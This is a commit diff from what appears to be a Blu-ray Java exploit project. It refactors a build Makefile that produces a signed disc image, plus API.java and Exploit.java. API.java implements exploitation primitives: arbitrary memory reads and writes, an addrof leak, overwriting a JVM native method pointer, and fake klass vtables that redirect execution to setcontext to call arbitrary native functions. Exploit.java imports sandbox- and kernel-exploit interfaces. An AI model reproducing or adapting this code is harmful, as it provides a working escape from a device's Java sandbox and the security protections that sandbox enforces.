Clean up.

Makefile

@@ -28,7 +28,7 @@ CLASSES = \
 
 JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
 
-all: directory serialized classes jar bdmv
+all: directory serialized classes jar bdjo_bdmv
 
 directory:
 	mkdir -p $(BUILD)
@@ -47,7 +47,7 @@ jar:
 	cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
 	java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
 
-bdmv:
+bdjo_bdmv:
 	java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
 	java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
 	java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv

src/com/bdjb/API.java

@@ -81,6 +81,10 @@ public final class API {
 
   private native long multiNewArray(long componentType, int[] dimensions);
 
+  public boolean isJdk11() {
+    return jdk11;
+  }
+
   private void init() throws Exception {
     initUnsafe();
     initDlsym();
@@ -112,6 +116,7 @@ public final class API {
     }
 
     handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
+
     findMethod.setAccessible(true);
     handleField.setAccessible(true);
 
@@ -174,6 +179,7 @@ public final class API {
     long apiInstance = addrof(this);
     long apiKlass = read64(apiInstance + 0x08);
 
+    boolean installed = false;
     if (jdk11) {
       long methods = read64(apiKlass + 0x170);
       int numMethods = read32(methods + 0x00);
@@ -194,7 +200,8 @@ public final class API {
         if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
             && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
           write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
-          return;
+          installed = true;
+          break;
         }
       }
     } else {
@@ -217,12 +224,24 @@ public final class API {
         if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
             && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
           write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
-          return;
+          installed = true;
+          break;
         }
       }
     }
 
-    throw new IllegalStateException("Could not install native method.");
+    if (!installed) {
+      throw new IllegalStateException("Could not install native method.");
+    }
+
+    // Invoke call method many times to kick in optimization.
+    train();
+  }
+
+  private void train() {
+    for (int i = 0; i < 10000; i++) {
+      call(0);
+    }
   }
 
   private void buildContext(
@@ -262,12 +281,6 @@ public final class API {
     write64(contextBuf + 0x118, 0);
   }
 
-  public void train() {
-    for (int i = 0; i < 10000; i++) {
-      call(0);
-    }
-  }
-
   public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
     long fakeClassOop = malloc(INT64_SIZE);
     long fakeClass = malloc(0x100);
@@ -278,11 +291,6 @@ public final class API {
       throw new IllegalStateException("Could not allocate memory.");
     }
 
-    write64(fakeClassOop, 0);
-    memset(fakeClass, 0, 0x100);
-    memset(fakeKlass, 0, 0x200);
-    memset(fakeKlassVtable, 0, 0x400);
-
     try {
       long ret = 0;
 
@@ -306,10 +314,13 @@ public final class API {
           } else {
             write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
           }
+
           ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
 
-          buildContext(
-              fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
+          if (i == 0) {
+            buildContext(
+                fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
+          }
         }
       } else {
         write64(fakeClassOop + 0x00, fakeClass);
@@ -326,10 +337,13 @@ public final class API {
           } else {
             write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
           }
+
           ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
 
-          buildContext(
-              fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
+          if (i == 0) {
+            buildContext(
+                fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
+          }
         }
       }
 

src/com/bdjb/Exploit.java

@@ -7,11 +7,11 @@
 
 package com.bdjb;
 
-import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
+import com.bdjb.exploit.kernel.ExploitKernelInterface;
 import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
 import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
+import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
 import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import com.bdjb.exploit.kernel.ExploitKernelInterface;
 import java.io.FileOutputStream;
 import java.io.InputStream;
 import java.io.OutputStream;